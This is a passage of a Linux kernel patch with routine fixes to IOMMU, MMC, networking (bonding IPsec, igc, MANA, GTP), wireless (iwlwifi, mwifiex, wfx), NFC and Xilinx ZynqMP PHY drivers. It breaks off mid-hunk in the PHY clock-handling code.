+index 0ba817e863465..1e38a24eb71cb 100644
+--- a/drivers/iommu/io-pgtable-arm.c
++++ b/drivers/iommu/io-pgtable-arm.c
+@@ -480,9 +480,8 @@ static int arm_lpae_map_pages(struct io_pgtable_ops *ops, unsigned long iova,
+ 	if (WARN_ON(iaext || paddr >> cfg->oas))
+ 		return -ERANGE;
+ 
+-	/* If no access, then nothing to do */
+ 	if (!(iommu_prot & (IOMMU_READ | IOMMU_WRITE)))
+-		return 0;
++		return -EINVAL;
+ 
+ 	prot = arm_lpae_prot_to_pte(data, iommu_prot);
+ 	ret = __arm_lpae_map(data, iova, paddr, pgsize, pgcount, prot, lvl,
+diff --git a/drivers/iommu/io-pgtable-dart.c b/drivers/iommu/io-pgtable-dart.c
+index 74b1ef2b96bee..10811e0b773d3 100644
+--- a/drivers/iommu/io-pgtable-dart.c
++++ b/drivers/iommu/io-pgtable-dart.c
+@@ -250,9 +250,8 @@ static int dart_map_pages(struct io_pgtable_ops *ops, unsigned long iova,
+ 	if (WARN_ON(paddr >> cfg->oas))
+ 		return -ERANGE;
+ 
+-	/* If no access, then nothing to do */
+ 	if (!(iommu_prot & (IOMMU_READ | IOMMU_WRITE)))
+-		return 0;
++		return -EINVAL;
+ 
+ 	tbl = dart_get_table(data, iova);
+ 
+diff --git a/drivers/mmc/core/core.c b/drivers/mmc/core/core.c
+index df85c35a86a3b..fc2fca5325ba5 100644
+--- a/drivers/mmc/core/core.c
++++ b/drivers/mmc/core/core.c
+@@ -142,8 +142,7 @@ void mmc_request_done(struct mmc_host *host, struct mmc_request *mrq)
+ 	int err = cmd->error;
+ 
+ 	/* Flag re-tuning needed on CRC errors */
+-	if (cmd->opcode != MMC_SEND_TUNING_BLOCK &&
+-	    cmd->opcode != MMC_SEND_TUNING_BLOCK_HS200 &&
++	if (!mmc_op_tuning(cmd->opcode) &&
+ 	    !host->retune_crc_disable &&
+ 	    (err == -EILSEQ || (mrq->sbc && mrq->sbc->error == -EILSEQ) ||
+ 	    (mrq->data && mrq->data->error == -EILSEQ) ||
+diff --git a/drivers/mmc/host/dw_mmc.c b/drivers/mmc/host/dw_mmc.c
+index a0ccf88876f98..d0da4573b38cd 100644
+--- a/drivers/mmc/host/dw_mmc.c
++++ b/drivers/mmc/host/dw_mmc.c
+@@ -334,8 +334,7 @@ static u32 dw_mci_prep_stop_abort(struct dw_mci *host, struct mmc_command *cmd)
+ 	    cmdr == MMC_READ_MULTIPLE_BLOCK ||
+ 	    cmdr == MMC_WRITE_BLOCK ||
+ 	    cmdr == MMC_WRITE_MULTIPLE_BLOCK ||
+-	    cmdr == MMC_SEND_TUNING_BLOCK ||
+-	    cmdr == MMC_SEND_TUNING_BLOCK_HS200 ||
++	    mmc_op_tuning(cmdr) ||
+ 	    cmdr == MMC_GEN_CMD) {
+ 		stop->opcode = MMC_STOP_TRANSMISSION;
+ 		stop->arg = 0;
+diff --git a/drivers/mmc/host/mtk-sd.c b/drivers/mmc/host/mtk-sd.c
+index 70e414027155d..ba18e9fa64b15 100644
+--- a/drivers/mmc/host/mtk-sd.c
++++ b/drivers/mmc/host/mtk-sd.c
+@@ -1206,10 +1206,8 @@ static bool msdc_cmd_done(struct msdc_host *host, int events,
+ 	}
+ 
+ 	if (!sbc_error && !(events & MSDC_INT_CMDRDY)) {
+-		if (events & MSDC_INT_CMDTMO ||
+-		    (cmd->opcode != MMC_SEND_TUNING_BLOCK &&
+-		     cmd->opcode != MMC_SEND_TUNING_BLOCK_HS200 &&
+-		     !host->hs400_tuning))
++		if ((events & MSDC_INT_CMDTMO && !host->hs400_tuning) ||
++		    (!mmc_op_tuning(cmd->opcode) && !host->hs400_tuning))
+ 			/*
+ 			 * should not clear fifo/interrupt as the tune data
+ 			 * may have alreay come when cmd19/cmd21 gets response
+@@ -1301,11 +1299,9 @@ static void msdc_start_command(struct msdc_host *host,
+ static void msdc_cmd_next(struct msdc_host *host,
+ 		struct mmc_request *mrq, struct mmc_command *cmd)
+ {
+-	if ((cmd->error &&
+-	    !(cmd->error == -EILSEQ &&
+-	      (cmd->opcode == MMC_SEND_TUNING_BLOCK ||
+-	       cmd->opcode == MMC_SEND_TUNING_BLOCK_HS200 ||
+-	       host->hs400_tuning))) ||
++	if ((cmd->error && !host->hs400_tuning &&
++	     !(cmd->error == -EILSEQ &&
++	     mmc_op_tuning(cmd->opcode))) ||
+ 	    (mrq->sbc && mrq->sbc->error))
+ 		msdc_request_done(host, mrq);
+ 	else if (cmd == mrq->sbc)
+diff --git a/drivers/mmc/host/sdhci-msm.c b/drivers/mmc/host/sdhci-msm.c
+index e37fb25577c0f..28bd562c439ef 100644
+--- a/drivers/mmc/host/sdhci-msm.c
++++ b/drivers/mmc/host/sdhci-msm.c
+@@ -2218,8 +2218,7 @@ static int __sdhci_msm_check_write(struct sdhci_host *host, u16 val, int reg)
+ 		if (!msm_host->use_cdr)
+ 			break;
+ 		if ((msm_host->transfer_mode & SDHCI_TRNS_READ) &&
+-		    SDHCI_GET_CMD(val) != MMC_SEND_TUNING_BLOCK_HS200 &&
+-		    SDHCI_GET_CMD(val) != MMC_SEND_TUNING_BLOCK)
++		    !mmc_op_tuning(SDHCI_GET_CMD(val)))
+ 			sdhci_msm_set_cdr(host, true);
+ 		else
+ 			sdhci_msm_set_cdr(host, false);
+diff --git a/drivers/mmc/host/sdhci-pci-o2micro.c b/drivers/mmc/host/sdhci-pci-o2micro.c
+index 24bb0e9809e76..cfa0956e7d72a 100644
+--- a/drivers/mmc/host/sdhci-pci-o2micro.c
++++ b/drivers/mmc/host/sdhci-pci-o2micro.c
+@@ -326,8 +326,7 @@ static int sdhci_o2_execute_tuning(struct mmc_host *mmc, u32 opcode)
+ 		(host->timing != MMC_TIMING_UHS_SDR50))
+ 		return sdhci_execute_tuning(mmc, opcode);
+ 
+-	if (WARN_ON((opcode != MMC_SEND_TUNING_BLOCK_HS200) &&
+-			(opcode != MMC_SEND_TUNING_BLOCK)))
++	if (WARN_ON(!mmc_op_tuning(opcode)))
+ 		return -EINVAL;
+ 
+ 	/* Force power mode enter L0 */
+diff --git a/drivers/mmc/host/sdhci-tegra.c b/drivers/mmc/host/sdhci-tegra.c
+index 1adaa94c31aca..62d236bfe9377 100644
+--- a/drivers/mmc/host/sdhci-tegra.c
++++ b/drivers/mmc/host/sdhci-tegra.c
+@@ -268,13 +268,9 @@ static void tegra210_sdhci_writew(struct sdhci_host *host, u16 val, int reg)
+ {
+ 	bool is_tuning_cmd = 0;
+ 	bool clk_enabled;
+-	u8 cmd;
+ 
+-	if (reg == SDHCI_COMMAND) {
+-		cmd = SDHCI_GET_CMD(val);
+-		is_tuning_cmd = cmd == MMC_SEND_TUNING_BLOCK ||
+-				cmd == MMC_SEND_TUNING_BLOCK_HS200;
+-	}
++	if (reg == SDHCI_COMMAND)
++		is_tuning_cmd = mmc_op_tuning(SDHCI_GET_CMD(val));
+ 
+ 	if (is_tuning_cmd)
+ 		clk_enabled = tegra_sdhci_configure_card_clk(host, 0);
+diff --git a/drivers/mmc/host/sdhci.c b/drivers/mmc/host/sdhci.c
+index 4237d8ae878c1..536d21028a116 100644
+--- a/drivers/mmc/host/sdhci.c
++++ b/drivers/mmc/host/sdhci.c
+@@ -1712,8 +1712,7 @@ static bool sdhci_send_command(struct sdhci_host *host, struct mmc_command *cmd)
+ 		flags |= SDHCI_CMD_INDEX;
+ 
+ 	/* CMD19 is special in that the Data Present Select should be set */
+-	if (cmd->data || cmd->opcode == MMC_SEND_TUNING_BLOCK ||
+-	    cmd->opcode == MMC_SEND_TUNING_BLOCK_HS200)
++	if (cmd->data || mmc_op_tuning(cmd->opcode))
+ 		flags |= SDHCI_CMD_DATA;
+ 
+ 	timeout = jiffies;
+@@ -3396,8 +3395,6 @@ static void sdhci_adma_show_error(struct sdhci_host *host)
+ 
+ static void sdhci_data_irq(struct sdhci_host *host, u32 intmask)
+ {
+-	u32 command;
+-
+ 	/*
+ 	 * CMD19 generates _only_ Buffer Read Ready interrupt if
+ 	 * use sdhci_send_tuning.
+@@ -3406,9 +3403,7 @@ static void sdhci_data_irq(struct sdhci_host *host, u32 intmask)
+ 	 * SDHCI_INT_DATA_AVAIL always there, stuck in irq storm.
+ 	 */
+ 	if (intmask & SDHCI_INT_DATA_AVAIL && !host->data) {
+-		command = SDHCI_GET_CMD(sdhci_readw(host, SDHCI_COMMAND));
+-		if (command == MMC_SEND_TUNING_BLOCK ||
+-		    command == MMC_SEND_TUNING_BLOCK_HS200) {
++		if (mmc_op_tuning(SDHCI_GET_CMD(sdhci_readw(host, SDHCI_COMMAND)))) {
+ 			host->tuning_done = 1;
+ 			wake_up(&host->buf_ready_int);
+ 			return;
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index c218352814430..375412ce1ea5f 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -577,12 +577,47 @@ static void bond_ipsec_del_sa_all(struct bonding *bond)
+ 				   __func__);
+ 		} else {
+ 			slave->dev->xfrmdev_ops->xdo_dev_state_delete(ipsec->xs);
++			if (slave->dev->xfrmdev_ops->xdo_dev_state_free)
++				slave->dev->xfrmdev_ops->xdo_dev_state_free(ipsec->xs);
+ 		}
+ 	}
+ 	spin_unlock_bh(&bond->ipsec_lock);
+ 	rcu_read_unlock();
+ }
+ 
++static void bond_ipsec_free_sa(struct xfrm_state *xs)
++{
++	struct net_device *bond_dev = xs->xso.dev;
++	struct net_device *real_dev;
++	netdevice_tracker tracker;
++	struct bonding *bond;
++	struct slave *slave;
++
++	if (!bond_dev)
++		return;
++
++	rcu_read_lock();
++	bond = netdev_priv(bond_dev);
++	slave = rcu_dereference(bond->curr_active_slave);
++	real_dev = slave ? slave->dev : NULL;
++	netdev_hold(real_dev, &tracker, GFP_ATOMIC);
++	rcu_read_unlock();
++
++	if (!slave)
++		goto out;
++
++	if (!xs->xso.real_dev)
++		goto out;
++
++	WARN_ON(xs->xso.real_dev != real_dev);
++
++	if (real_dev && real_dev->xfrmdev_ops &&
++	    real_dev->xfrmdev_ops->xdo_dev_state_free)
++		real_dev->xfrmdev_ops->xdo_dev_state_free(xs);
++out:
++	netdev_put(real_dev, &tracker);
++}
++
+ /**
+  * bond_ipsec_offload_ok - can this packet use the xfrm hw offload
+  * @skb: current data packet
+@@ -623,6 +658,7 @@ static bool bond_ipsec_offload_ok(struct sk_buff *skb, struct xfrm_state *xs)
+ static const struct xfrmdev_ops bond_xfrmdev_ops = {
+ 	.xdo_dev_state_add = bond_ipsec_add_sa,
+ 	.xdo_dev_state_delete = bond_ipsec_del_sa,
++	.xdo_dev_state_free = bond_ipsec_free_sa,
+ 	.xdo_dev_offload_ok = bond_ipsec_offload_ok,
+ };
+ #endif /* CONFIG_XFRM_OFFLOAD */
+diff --git a/drivers/net/ethernet/intel/igc/igc_tsn.c b/drivers/net/ethernet/intel/igc/igc_tsn.c
+index abdaaf7db4125..ad358c95c0a45 100644
+--- a/drivers/net/ethernet/intel/igc/igc_tsn.c
++++ b/drivers/net/ethernet/intel/igc/igc_tsn.c
+@@ -49,12 +49,19 @@ static unsigned int igc_tsn_new_flags(struct igc_adapter *adapter)
+ 	return new_flags;
+ }
+ 
++static bool igc_tsn_is_tx_mode_in_tsn(struct igc_adapter *adapter)
++{
++	struct igc_hw *hw = &adapter->hw;
++
++	return !!(rd32(IGC_TQAVCTRL) & IGC_TQAVCTRL_TRANSMIT_MODE_TSN);
++}
++
+ void igc_tsn_adjust_txtime_offset(struct igc_adapter *adapter)
+ {
+ 	struct igc_hw *hw = &adapter->hw;
+ 	u16 txoffset;
+ 
+-	if (!is_any_launchtime(adapter))
++	if (!igc_tsn_is_tx_mode_in_tsn(adapter))
+ 		return;
+ 
+ 	switch (adapter->link_speed) {
+diff --git a/drivers/net/ethernet/microsoft/mana/hw_channel.c b/drivers/net/ethernet/microsoft/mana/hw_channel.c
+index 543a5d5c304f3..66a0552fc8b3a 100644
+--- a/drivers/net/ethernet/microsoft/mana/hw_channel.c
++++ b/drivers/net/ethernet/microsoft/mana/hw_channel.c
+@@ -51,9 +51,33 @@ static int mana_hwc_verify_resp_msg(const struct hwc_caller_ctx *caller_ctx,
+ 	return 0;
+ }
+ 
++static int mana_hwc_post_rx_wqe(const struct hwc_wq *hwc_rxq,
++				struct hwc_work_request *req)
++{
++	struct device *dev = hwc_rxq->hwc->dev;
++	struct gdma_sge *sge;
++	int err;
++
++	sge = &req->sge;
++	sge->address = (u64)req->buf_sge_addr;
++	sge->mem_key = hwc_rxq->msg_buf->gpa_mkey;
++	sge->size = req->buf_len;
++
++	memset(&req->wqe_req, 0, sizeof(struct gdma_wqe_request));
++	req->wqe_req.sgl = sge;
++	req->wqe_req.num_sge = 1;
++	req->wqe_req.client_data_unit = 0;
++
++	err = mana_gd_post_and_ring(hwc_rxq->gdma_wq, &req->wqe_req, NULL);
++	if (err)
++		dev_err(dev, "Failed to post WQE on HWC RQ: %d\n", err);
++	return err;
++}
++
+ static void mana_hwc_handle_resp(struct hw_channel_context *hwc, u32 resp_len,
+-				 const struct gdma_resp_hdr *resp_msg)
++				 struct hwc_work_request *rx_req)
+ {
++	const struct gdma_resp_hdr *resp_msg = rx_req->buf_va;
+ 	struct hwc_caller_ctx *ctx;
+ 	int err;
+ 
+@@ -61,6 +85,7 @@ static void mana_hwc_handle_resp(struct hw_channel_context *hwc, u32 resp_len,
+ 		      hwc->inflight_msg_res.map)) {
+ 		dev_err(hwc->dev, "hwc_rx: invalid msg_id = %u\n",
+ 			resp_msg->response.hwc_msg_id);
++		mana_hwc_post_rx_wqe(hwc->rxq, rx_req);
+ 		return;
+ 	}
+ 
+@@ -74,30 +99,13 @@ static void mana_hwc_handle_resp(struct hw_channel_context *hwc, u32 resp_len,
+ 	memcpy(ctx->output_buf, resp_msg, resp_len);
+ out:
+ 	ctx->error = err;
+-	complete(&ctx->comp_event);
+-}
+-
+-static int mana_hwc_post_rx_wqe(const struct hwc_wq *hwc_rxq,
+-				struct hwc_work_request *req)
+-{
+-	struct device *dev = hwc_rxq->hwc->dev;
+-	struct gdma_sge *sge;
+-	int err;
+-
+-	sge = &req->sge;
+-	sge->address = (u64)req->buf_sge_addr;
+-	sge->mem_key = hwc_rxq->msg_buf->gpa_mkey;
+-	sge->size = req->buf_len;
+ 
+-	memset(&req->wqe_req, 0, sizeof(struct gdma_wqe_request));
+-	req->wqe_req.sgl = sge;
+-	req->wqe_req.num_sge = 1;
+-	req->wqe_req.client_data_unit = 0;
++	/* Must post rx wqe before complete(), otherwise the next rx may
++	 * hit no_wqe error.
++	 */
++	mana_hwc_post_rx_wqe(hwc->rxq, rx_req);
+ 
+-	err = mana_gd_post_and_ring(hwc_rxq->gdma_wq, &req->wqe_req, NULL);
+-	if (err)
+-		dev_err(dev, "Failed to post WQE on HWC RQ: %d\n", err);
+-	return err;
++	complete(&ctx->comp_event);
+ }
+ 
+ static void mana_hwc_init_event_handler(void *ctx, struct gdma_queue *q_self,
+@@ -216,14 +224,12 @@ static void mana_hwc_rx_event_handler(void *ctx, u32 gdma_rxq_id,
+ 		return;
+ 	}
+ 
+-	mana_hwc_handle_resp(hwc, rx_oob->tx_oob_data_size, resp);
++	mana_hwc_handle_resp(hwc, rx_oob->tx_oob_data_size, rx_req);
+ 
+-	/* Do no longer use 'resp', because the buffer is posted to the HW
+-	 * in the below mana_hwc_post_rx_wqe().
++	/* Can no longer use 'resp', because the buffer is posted to the HW
++	 * in mana_hwc_handle_resp() above.
+ 	 */
+ 	resp = NULL;
+-
+-	mana_hwc_post_rx_wqe(hwc_rxq, rx_req);
+ }
+ 
+ static void mana_hwc_tx_event_handler(void *ctx, u32 gdma_txq_id,
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index 512daeb14e28b..bbe8d76b1595e 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -1219,7 +1219,7 @@ static struct sock *gtp_encap_enable_socket(int fd, int type,
+ 	sock = sockfd_lookup(fd, &err);
+ 	if (!sock) {
+ 		pr_debug("gtp socket fd=%d not found\n", fd);
+-		return NULL;
++		return ERR_PTR(err);
+ 	}
+ 
+ 	sk = sock->sk;
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+index 235963e1d7a9a..c96dfd7fd3dc8 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+@@ -825,22 +825,25 @@ int iwl_sar_get_wgds_table(struct iwl_fw_runtime *fwrt)
+ 				entry = &wifi_pkg->package.elements[entry_idx];
+ 				entry_idx++;
+ 				if (entry->type != ACPI_TYPE_INTEGER ||
+-				    entry->integer.value > num_profiles) {
++				    entry->integer.value > num_profiles ||
++				    entry->integer.value <
++					rev_data[idx].min_profiles) {
+ 					ret = -EINVAL;
+ 					goto out_free;
+ 				}
+-				num_profiles = entry->integer.value;
+ 
+ 				/*
+-				 * this also validates >= min_profiles since we
+-				 * otherwise wouldn't have gotten the data when
+-				 * looking up in ACPI
++				 * Check to see if we received package count
++				 * same as max # of profiles
+ 				 */
+ 				if (wifi_pkg->package.count !=
+ 				    hdr_size + profile_size * num_profiles) {
+ 					ret = -EINVAL;
+ 					goto out_free;
+ 				}
++
++				/* Number of valid profiles */
++				num_profiles = entry->integer.value;
+ 			}
+ 			goto read_table;
+ 		}
+diff --git a/drivers/net/wireless/marvell/mwifiex/cfg80211.c b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
+index d1b23dba5ad50..3cde6fc3bb813 100644
+--- a/drivers/net/wireless/marvell/mwifiex/cfg80211.c
++++ b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
+@@ -4362,11 +4362,27 @@ int mwifiex_register_cfg80211(struct mwifiex_adapter *adapter)
+ 	if (ISSUPP_ADHOC_ENABLED(adapter->fw_cap_info))
+ 		wiphy->interface_modes |= BIT(NL80211_IFTYPE_ADHOC);
+ 
+-	wiphy->bands[NL80211_BAND_2GHZ] = &mwifiex_band_2ghz;
+-	if (adapter->config_bands & BAND_A)
+-		wiphy->bands[NL80211_BAND_5GHZ] = &mwifiex_band_5ghz;
+-	else
++	wiphy->bands[NL80211_BAND_2GHZ] = devm_kmemdup(adapter->dev,
++						       &mwifiex_band_2ghz,
++						       sizeof(mwifiex_band_2ghz),
++						       GFP_KERNEL);
++	if (!wiphy->bands[NL80211_BAND_2GHZ]) {
++		ret = -ENOMEM;
++		goto err;
++	}
++
++	if (adapter->config_bands & BAND_A) {
++		wiphy->bands[NL80211_BAND_5GHZ] = devm_kmemdup(adapter->dev,
++							       &mwifiex_band_5ghz,
++							       sizeof(mwifiex_band_5ghz),
++							       GFP_KERNEL);
++		if (!wiphy->bands[NL80211_BAND_5GHZ]) {
++			ret = -ENOMEM;
++			goto err;
++		}
++	} else {
+ 		wiphy->bands[NL80211_BAND_5GHZ] = NULL;
++	}
+ 
+ 	if (adapter->drcs_enabled && ISSUPP_DRCS_ENABLED(adapter->fw_cap_info))
+ 		wiphy->iface_combinations = &mwifiex_iface_comb_ap_sta_drcs;
+@@ -4459,8 +4475,7 @@ int mwifiex_register_cfg80211(struct mwifiex_adapter *adapter)
+ 	if (ret < 0) {
+ 		mwifiex_dbg(adapter, ERROR,
+ 			    "%s: wiphy_register failed: %d\n", __func__, ret);
+-		wiphy_free(wiphy);
+-		return ret;
++		goto err;
+ 	}
+ 
+ 	if (!adapter->regd) {
+@@ -4502,4 +4517,9 @@ int mwifiex_register_cfg80211(struct mwifiex_adapter *adapter)
+ 
+ 	adapter->wiphy = wiphy;
+ 	return ret;
++
++err:
++	wiphy_free(wiphy);
++
++	return ret;
+ }
+diff --git a/drivers/net/wireless/silabs/wfx/sta.c b/drivers/net/wireless/silabs/wfx/sta.c
+index 871667650dbef..048a552e9da1d 100644
+--- a/drivers/net/wireless/silabs/wfx/sta.c
++++ b/drivers/net/wireless/silabs/wfx/sta.c
+@@ -370,8 +370,11 @@ static int wfx_set_mfp_ap(struct wfx_vif *wvif)
+ 
+ 	ptr = (u16 *)cfg80211_find_ie(WLAN_EID_RSN, skb->data + ieoffset,
+ 				      skb->len - ieoffset);
+-	if (unlikely(!ptr))
++	if (!ptr) {
++		/* No RSN IE is fine in open networks */
++		ret = 0;
+ 		goto free_skb;
++	}
+ 
+ 	ptr += pairwise_cipher_suite_count_offset;
+ 	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+diff --git a/drivers/nfc/pn533/pn533.c b/drivers/nfc/pn533/pn533.c
+index f0cac19005527..2e0871409926b 100644
+--- a/drivers/nfc/pn533/pn533.c
++++ b/drivers/nfc/pn533/pn533.c
+@@ -1723,6 +1723,11 @@ static int pn533_start_poll(struct nfc_dev *nfc_dev,
+ 	}
+ 
+ 	pn533_poll_create_mod_list(dev, im_protocols, tm_protocols);
++	if (!dev->poll_mod_count) {
++		nfc_err(dev->dev,
++			"Poll mod list is empty\n");
++		return -EINVAL;
++	}
+ 
+ 	/* Do not always start polling from the same modulation */
+ 	get_random_bytes(&rand_mod, sizeof(rand_mod));
+diff --git a/drivers/phy/xilinx/phy-zynqmp.c b/drivers/phy/xilinx/phy-zynqmp.c
+index 9be9535ad7ab7..ac9a9124a36de 100644
+--- a/drivers/phy/xilinx/phy-zynqmp.c
++++ b/drivers/phy/xilinx/phy-zynqmp.c
+@@ -21,6 +21,7 @@
+ #include <linux/of.h>
+ #include <linux/phy/phy.h>
+ #include <linux/platform_device.h>
++#include <linux/pm_runtime.h>
+ #include <linux/slab.h>
+ 
+ #include <dt-bindings/phy/phy.h>
+@@ -80,7 +81,8 @@
+ 
+ /* Reference clock selection parameters */
+ #define L0_Ln_REF_CLK_SEL(n)		(0x2860 + (n) * 4)
+-#define L0_REF_CLK_SEL_MASK		0x8f
++#define L0_REF_CLK_LCL_SEL		BIT(7)
++#define L0_REF_CLK_SEL_MASK		0x9f
+ 
+ /* Calibration digital logic parameters */
+ #define L3_TM_CALIB_DIG19		0xec4c
+@@ -165,6 +167,24 @@
+ /* Timeout values */
+ #define TIMEOUT_US			1000
+ 
++/* Lane 0/1/2/3 offset */
++#define DIG_8(n)		((0x4000 * (n)) + 0x1074)
++#define ILL13(n)		((0x4000 * (n)) + 0x1994)
++#define DIG_10(n)		((0x4000 * (n)) + 0x107c)
++#define RST_DLY(n)		((0x4000 * (n)) + 0x19a4)
++#define BYP_15(n)		((0x4000 * (n)) + 0x1038)
++#define BYP_12(n)		((0x4000 * (n)) + 0x102c)
++#define MISC3(n)		((0x4000 * (n)) + 0x19ac)
++#define EQ11(n)			((0x4000 * (n)) + 0x1978)
++
++static u32 save_reg_address[] = {
++	/* Lane 0/1/2/3 Register */
++	DIG_8(0), ILL13(0), DIG_10(0), RST_DLY(0), BYP_15(0), BYP_12(0), MISC3(0), EQ11(0),
++	DIG_8(1), ILL13(1), DIG_10(1), RST_DLY(1), BYP_15(1), BYP_12(1), MISC3(1), EQ11(1),
++	DIG_8(2), ILL13(2), DIG_10(2), RST_DLY(2), BYP_15(2), BYP_12(2), MISC3(2), EQ11(2),
++	DIG_8(3), ILL13(3), DIG_10(3), RST_DLY(3), BYP_15(3), BYP_12(3), MISC3(3), EQ11(3),
++};
++
+ struct xpsgtr_dev;
+ 
+ /**
+@@ -213,6 +233,7 @@ struct xpsgtr_phy {
+  * @tx_term_fix: fix for GT issue
+  * @saved_icm_cfg0: stored value of ICM CFG0 register
+  * @saved_icm_cfg1: stored value of ICM CFG1 register
++ * @saved_regs: registers to be saved/restored during suspend/resume
+  */
+ struct xpsgtr_dev {
+ 	struct device *dev;
+@@ -225,6 +246,7 @@ struct xpsgtr_dev {
+ 	bool tx_term_fix;
+ 	unsigned int saved_icm_cfg0;
+ 	unsigned int saved_icm_cfg1;
++	u32 *saved_regs;
+ };
+ 
+ /*
+@@ -298,6 +320,32 @@ static inline void xpsgtr_clr_set_phy(struct xpsgtr_phy *gtr_phy,
+ 	writel((readl(addr) & ~clr) | set, addr);
+ }
+ 
++/**
++ * xpsgtr_save_lane_regs - Saves registers on suspend
++ * @gtr_dev: pointer to phy controller context structure
++ */
++static void xpsgtr_save_lane_regs(struct xpsgtr_dev *gtr_dev)
++{
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(save_reg_address); i++)
++		gtr_dev->saved_regs[i] = xpsgtr_read(gtr_dev,
++						     save_reg_address[i]);
++}
++
++/**
++ * xpsgtr_restore_lane_regs - Restores registers on resume
++ * @gtr_dev: pointer to phy controller context structure
++ */
++static void xpsgtr_restore_lane_regs(struct xpsgtr_dev *gtr_dev)
++{
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(save_reg_address); i++)
++		xpsgtr_write(gtr_dev, save_reg_address[i],
++			     gtr_dev->saved_regs[i]);
++}
++
+ /*
+  * Hardware Configuration
+  */
+@@ -349,11 +397,12 @@ static void xpsgtr_configure_pll(struct xpsgtr_phy *gtr_phy)
+ 		       PLL_FREQ_MASK, ssc->pll_ref_clk);
+ 
+ 	/* Enable lane clock sharing, if required */
+-	if (gtr_phy->refclk != gtr_phy->lane) {
+-		/* Lane3 Ref Clock Selection Register */
++	if (gtr_phy->refclk == gtr_phy->lane)
++		xpsgtr_clr_set(gtr_phy->dev, L0_Ln_REF_CLK_SEL(gtr_phy->lane),
++			       L0_REF_CLK_SEL_MASK, L0_REF_CLK_LCL_SEL);
++	else
+ 		xpsgtr_clr_set(gtr_phy->dev, L0_Ln_REF_CLK_SEL(gtr_phy->lane),
+ 			       L0_REF_CLK_SEL_MASK, 1 << gtr_phy->refclk);
+-	}
+ 
+ 	/* SSC step size [7:0] */
+ 	xpsgtr_clr_set_phy(gtr_phy, L0_PLL_SS_STEP_SIZE_0_LSB,
+@@ -572,6 +621,10 @@ static int xpsgtr_phy_init(struct phy *phy)
+ 
+ 	mutex_lock(&gtr_dev->gtr_mutex);
+ 
++	/* Configure and enable the clock when peripheral phy_init call */
++	if (clk_prepare_enable(gtr_dev->clk[gtr_phy->refclk]))
++		goto out;
++
+ 	/* Skip initialization if not required. */
+ 	if (!xpsgtr_phy_init_required(gtr_phy))
+ 		goto out;
+@@ -616,9 +669,13 @@ static int xpsgtr_phy_init(struct phy *phy)
+ static int xpsgtr_phy_exit(struct phy *phy)
+ {
+ 	struct xpsgtr_phy *gtr_phy = phy_get_drvdata(phy);
++	struct xpsgtr_dev *gtr_dev = gtr_phy->dev;
+ 
+ 	gtr_phy->skip_phy_init = false;
+ 
++	/* Ensure that disable clock only, which configure for lane */
++	clk_disable_unprepare(gtr_dev->clk[gtr_phy->refclk]);
++
+ 	return 0;
+ }
+ 
+@@ -821,34 +878,27 @@ static struct phy *xpsgtr_xlate(struct device *dev,
+  * Power Management
+  */
+ 
+-static int __maybe_unused xpsgtr_suspend(struct device *dev)
++static int xpsgtr_runtime_suspend(struct device *dev)
+ {
+ 	struct xpsgtr_dev *gtr_dev = dev_get_drvdata(dev);
+-	unsigned int i;
+ 
+ 	/* Save the snapshot ICM_CFG registers. */
+ 	gtr_dev->saved_icm_cfg0 = xpsgtr_read(gtr_dev, ICM_CFG0);
+ 	gtr_dev->saved_icm_cfg1 = xpsgtr_read(gtr_dev, ICM_CFG1);
+ 
+-	for (i = 0; i < ARRAY_SIZE(gtr_dev->clk); i++)
+-		clk_disable_unprepare(gtr_dev->clk[i]);
++	xpsgtr_save_lane_regs(gtr_dev);
+ 
+ 	return 0;
+ }
+ 
+-static int __maybe_unused xpsgtr_resume(struct device *dev)
++static int xpsgtr_runtime_resume(struct device *dev)
+ {
+ 	struct xpsgtr_dev *gtr_dev = dev_get_drvdata(dev);
+ 	unsigned int icm_cfg0, icm_cfg1;
+ 	unsigned int i;
+ 	bool skip_phy_init;
+-	int err;
+ 
+-	for (i = 0; i < ARRAY_SIZE(gtr_dev->clk); i++) {
+-		err = clk_prepare_enable(gtr_dev->clk[i]);
+-		if (err)
+-			goto err_clk_put;
+-	}
++	xpsgtr_restore_lane_regs(gtr_dev);
+ 
+ 	icm_cfg0 = xpsgtr_read(gtr_dev, ICM_CFG0);
+ 	icm_cfg1 = xpsgtr_read(gtr_dev, ICM_CFG1);
+@@ -869,18 +919,10 @@ static int __maybe_unused xpsgtr_resume(struct device *dev)
+ 		gtr_dev->phys[i].skip_phy_init = skip_phy_init;
+ 
+ 	return 0;
+-
+-err_clk_put:
+-	while (i--)
+-		clk_disable_unprepare(gtr_dev->clk[i]);
+-
+-	return err;
+ }
+ 
+-static const struct dev_pm_ops xpsgtr_pm_ops = {
+-	SET_SYSTEM_SLEEP_PM_OPS(xpsgtr_suspend, xpsgtr_resume)
+-};
+-
++static DEFINE_RUNTIME_DEV_PM_OPS(xpsgtr_pm_ops, xpsgtr_runtime_suspend,
++				 xpsgtr_runtime_resume, NULL);
+ /*
+  * Probe & Platform Driver
+  */
+@@ -888,7 +930,6 @@ static const struct dev_pm_ops xpsgtr_pm_ops = {
+ static int xpsgtr_get_ref_clocks(struct xpsgtr_dev *gtr_dev)
+ {
+ 	unsigned int refclk;
+-	int ret;
+ 
+ 	for (refclk = 0; refclk < ARRAY_SIZE(gtr_dev->refclk_sscs); ++refclk) {
+ 		unsigned long rate;
+@@ -899,19 +940,14 @@ static int xpsgtr_get_ref_clocks(struct xpsgtr_dev *gtr_dev)
+ 		snprintf(name, sizeof(name), "ref%u", refclk);
+ 		clk = devm_clk_get_optional(gtr_dev->dev, name);
+ 		if (IS_ERR(clk)) {
+-			ret = dev_err_probe(gtr_dev->dev, PTR_ERR(clk),
+-					    "Failed to get reference clock %u\n",
+-					    refclk);
+-			goto err_clk_put;
